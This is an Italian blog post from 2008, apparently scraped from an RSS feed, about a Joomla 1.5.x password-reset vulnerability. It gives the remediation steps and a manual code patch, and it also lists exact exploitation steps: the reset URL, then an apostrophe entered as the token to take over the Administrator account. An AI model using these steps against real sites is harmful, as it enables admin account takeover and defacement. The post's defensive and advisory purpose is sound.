Per qualsiasi chiarimento non esitate a contattarmi.

Buona giornata

]]> http://www.capn3m0.org/navigare-anonimi-grazie-a-tor-firefox.html/feed/ 0 http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html#comments Sun, 14 Sep 2008 16:26:35 +0000 capn3m0 http://www.capn3m0.org/2008/09/joomla-15x-remote-admin-password-change/ In data 12 Agosto è stata scoperta una vulnerabilità del Cms Joomla versioni inferiori alla 1.5.6 che consente di sfruttare il componente “com_user” per editare a proprio piacimento la password di Administrator e, quindi, di sfruttare l’accesso Admin per eseguire defacement e simili.

Al link seguente troverete l’annuncio ufficiale:

http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html

Questo, invece, quello dal Sito Italiano:

http://www.joomlaitalia.com/content/view/323/90/

Sfruttare tale vulnerabilità risulta alquanto semplice poiché bastano pochi semplici passaggi per eseguire il reset:

1) Una volta individuato il Sito in Joomla caricare questo Url:

/index.php?option=com_user&view=reset&layout=confirm

2) A questo punto apparirà un form che chiederà l’inserimento di un codice che, teoricamente, avreste dovuto ricevere in mail

3) Inserite l’apice (‘) come carattere continuate

4) A questo punto avrete il campo di cambio password e, inserendola, editerete direttamente il profilo Administrator

Il supporto Joomla individuata la vulnerabilità (la variabile token non veniva correttamente verificata) ha provveduto a rilasciare in tempi da record la versione 1.5.6 con tale problema fixato. Dalla sua uscita sono stati scoperti ulteriori vulnerabilità che han portato alla release 1.5.7 in pochi giorni:

Potete scaricare dai seguenti link questa versione:

Joomla 1.5.7 Full Eng

Joomla 1.5.7 Full Ita

Per chi avesse subito un’hacking sfruttando questa vulnerabilità consiglio di aggiornare a questa versione e, nel caso siano ancora visibili “tracce” (home page cambiate) dell’hacker ho notato, per esperienza, che le pagine maggiormente colpite sono 3:

• configuration.php
• index.php (del template attivo nel Cms)
• la cartella “cache” (consiglio di svuotarla)

Provvedete a ripristinare le originali e il problema è risolto.

Dato che trovere il vostro account Admin non accessibile visto che è stata cambiata la password sarà necessario effettuare l’accesso direttamente al PhpMyAdmin e riscrivere la password nel Database.

Una guida a questa operazione la potete trovare qui.

Per chi non avesse sbattimento ho fatto uno scriptino veloce veloce che fa la stessa cosa. Basta copiare il file nella root della vostra installazione Joomla, richiamarlo da Browser e impostare la password.

Il file lo potete scaricare dal seguente link:

Joomla Change Admin Password

Infine, x chi ha molto sbattimento, di seguito la guida a come fixare tale vulnerabilità manualmente.

1. Aprire il file “/components/com_user/models/reset.php”
2. Posizionarsi alla riga 113 dopo la riga “global $mainframe;” ed inserire il seguente codice
   

   if(strlen($token) != 32) {
   $this->setError(JText::_(‘INVALID_TOKEN’));
   return false;
   }

3. Fine dei giochi!